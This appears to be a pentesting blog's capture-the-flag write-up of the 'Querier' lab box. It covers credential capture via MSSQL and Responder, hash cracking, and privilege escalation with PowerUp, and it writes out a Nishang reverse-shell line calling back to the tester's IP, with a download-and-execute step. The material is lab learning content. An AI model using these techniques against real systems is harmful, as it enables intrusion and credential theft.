Sat. Oct 24th, 2020

Pentesting Fun Stuff

following the cyber security path…

Querier

Enummeration

Starting of with a portscan.

No webserver and some services which you need credentials for to make a connection.

SMB

The share Reports is not default.

Looks like just one Excel file.

EXCEL

To check a OLE file on Kali there are several tools. This site has a nice overview.

It looks like the macro is recorded to make a connection with the SQL server, database Volume and there is also some credentials which it uses.

MSSQL

For a connection with the MSSQL server Impacket has a python script which can help.

This user has no permission to perform this action. After browsing the internet I found a page with some nice information.

First starting up Responder.

Then use the command xp_deltree to connect to my IP.

And capture the hash with Responder.

CRACKING THE HASH

Because I run my Kali in a VM I use John instead of Hashcat.

There is the password.

Last user didn’t had permission. Let’s see if it different with this user.

Looks like I can run commands with this user.

Getting some system information.

REVERSE SHELL

Time to get a reverse shell, which will give more freedom on this box. For this Kali has a folder with handy file called /usr/share/nishang. From this folder I copy a ps1 file to my working folder.

Then add a line to the bottom of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 9999

Now to get this file to the remote system. On my local machine I start a python server on port 80.

On this site there is a command to download and execute the file.

PRIVILEGE ESCALATION

On the Desktop of this user is the first flag.

On this github page there are some excellent PowerShell scripts. One of them is PowerUp.ps1, which is like LinEnum.sh for Linux.

The script finds several things and one of them is a password in plaintext.

 

With this account I have read and write permission.

Now for the final flag.

And there we have it. A really nice box with some challenges. And finally a Windows machine for a change.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.